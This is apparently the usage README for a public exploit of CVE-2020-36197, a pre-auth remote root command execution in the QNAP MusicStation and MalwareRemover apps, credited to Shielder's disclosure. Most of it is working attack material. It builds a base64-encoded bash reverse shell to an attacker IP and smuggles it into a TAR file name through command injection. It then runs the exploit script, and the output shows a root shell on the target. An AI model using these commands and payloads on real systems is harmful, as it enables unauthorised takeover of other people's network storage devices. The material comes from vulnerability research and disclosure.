QNAP MusicStation and MalwareRemover official apps are affected by an arbitrary file upload and a command injection vulnerabilities, leading to pre-auth remote root command execution.
Read more at https://www.shielder.it/advisories/qnap-musicstation-malwareremover-pre-auth-remote-code-execution/
- Create a new TAR file with the payload, e.g.:
$ git clone https://github.com/ptoomey3/evilarc
Cloning into 'evilarc'...
remote: Enumerating objects: 12, done.
remote: Total 12 (delta 0), reused 0 (delta 0), pack-reused 12
Unpacking objects: 100% (12/12), done.
$ cd evilarc/
$ echo -n 'bash -i >& /dev/tcp/172.16.42.114/8383 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==
$ touch ';echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#'
$ ./evilarc.py -f a.tar -o unix -d0 -p "/tmp/polict" ';echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#'
Creating a.tar containing /tmp/polict/;echo${IFS}-n${IFS}YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuNDIuMTE0LzgzODMgMD4mMQ==|base64${IFS}-d|bash;#
- Run the exploit with the correct arguments, e.g.:
python3 ./CVE-2020-36197.py -rh http://172.16.42.178:8080 -lh 172.16.42.114 -sh 19 -sm 16 -tf a.tar
$ ./$0.py -rh http://172.16.42.178:8080 -lh 172.16.42.114 -sh 19 -sm 16 -tf a.tar
2020-10-26 19:14:18,761 - INFO - sleeping for 41.23835 seconds to wait for 19:16:00 minus 1 minute...
2020-10-26 19:15:00,001 - INFO - starting remote shell handler...
2020-10-26 19:15:00,004 - INFO - continously uploading jpg with payload in background...
bash: no job control in this shell
bash-3.2# id
id
uid=0(admin) gid=0(administrators) groups=0(administrators),100(everyone)
bash-3.2# exit
exit
exit
*** Connection closed by remote host ***
- polict of Shielder for vulnerabilities discovery and exploit development.